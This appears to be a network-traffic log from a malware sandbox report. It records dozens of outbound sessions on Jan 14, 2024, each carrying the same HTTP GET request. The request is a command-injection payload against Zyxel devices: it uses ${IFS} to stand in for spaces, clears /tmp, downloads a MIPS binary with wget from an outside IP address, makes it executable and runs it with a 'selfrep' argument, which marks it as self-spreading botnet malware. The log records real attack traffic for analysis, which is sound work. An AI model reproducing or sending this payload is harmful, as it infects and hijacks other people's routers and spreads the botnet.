                                      Jan 14, 2024 15:51:06.764796972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9476192.168.2.1450482169.166.110.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764832020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9477192.168.2.1438566122.195.246.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764882088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9478192.168.2.144965052.116.127.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764905930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9479192.168.2.1440776138.146.187.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764930964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9480192.168.2.145083269.196.101.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764997005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9481192.168.2.145191460.221.226.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765006065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9482192.168.2.1437288140.104.115.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765053034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9483192.168.2.144362650.17.28.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765080929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9484192.168.2.1454860171.142.229.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765116930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9485192.168.2.14438685.179.21.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765167952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9486192.168.2.1449580211.156.23.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765218973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9487192.168.2.1448378184.109.57.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765249014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9488192.168.2.1455832149.221.69.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765271902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9489192.168.2.1456850191.61.235.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765330076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9490192.168.2.1438008187.29.45.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765360117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9491192.168.2.1457300124.112.9.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765414000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9492192.168.2.14537602.58.210.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765461922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9493192.168.2.1447104220.229.28.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765516996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9494192.168.2.1446580136.229.209.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765548944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9495192.168.2.143601667.66.23.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765577078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9496192.168.2.1439242131.130.128.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765626907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9497192.168.2.143892886.216.17.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765674114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9498192.168.2.1457168155.229.19.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765695095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9499192.168.2.1439250101.24.56.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765729904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9500192.168.2.1436364166.243.225.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765779018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9501192.168.2.1446728152.87.56.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765811920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9502192.168.2.145511836.68.157.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765856028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9503192.168.2.1441084212.132.173.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765913963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9504192.168.2.1457288184.79.10.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765947104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9505192.168.2.14560064.22.72.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.765986919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9506192.168.2.143741472.72.154.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766036034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9507192.168.2.14586865.238.152.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766072035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9508192.168.2.145958697.166.43.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766098022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9509192.168.2.143929032.142.124.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766134977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9510192.168.2.1451946186.197.166.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766180992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9511192.168.2.1445450146.160.242.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766201019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9512192.168.2.144151418.83.155.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766254902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9513192.168.2.1449668128.237.228.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766293049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9514192.168.2.1454924106.189.101.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766330957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9515192.168.2.145946881.221.248.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766385078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9516192.168.2.143965669.87.211.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766431093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9517192.168.2.145059869.185.201.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766485929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9518192.168.2.1434806196.214.227.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766500950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9519192.168.2.1455542136.235.148.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766552925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9520192.168.2.143745679.118.111.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766602993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9521192.168.2.1449158110.60.197.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766644955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9522192.168.2.1436976153.8.212.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766674995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9523192.168.2.143931459.216.105.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766738892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9524192.168.2.1455034130.7.66.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766757011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9525192.168.2.1458262122.109.64.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766803980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9526192.168.2.1441242134.103.66.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766835928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9527192.168.2.1450566206.189.109.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766884089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9528192.168.2.1449860137.239.18.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766918898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9529192.168.2.1455476111.59.166.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.766968012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9530192.168.2.144309094.57.236.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767009974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9531192.168.2.1445488218.250.191.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767066002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9532192.168.2.1432850185.142.174.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767083883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9533192.168.2.1449150218.99.200.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767119884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9534192.168.2.1448352107.183.129.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767155886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9535192.168.2.1437018172.46.152.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767190933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9536192.168.2.1458976159.0.124.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767234087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9537192.168.2.1446682164.20.65.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767271042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9538192.168.2.145705419.127.93.206443
                                      TimestampBytes transferredDirectionData
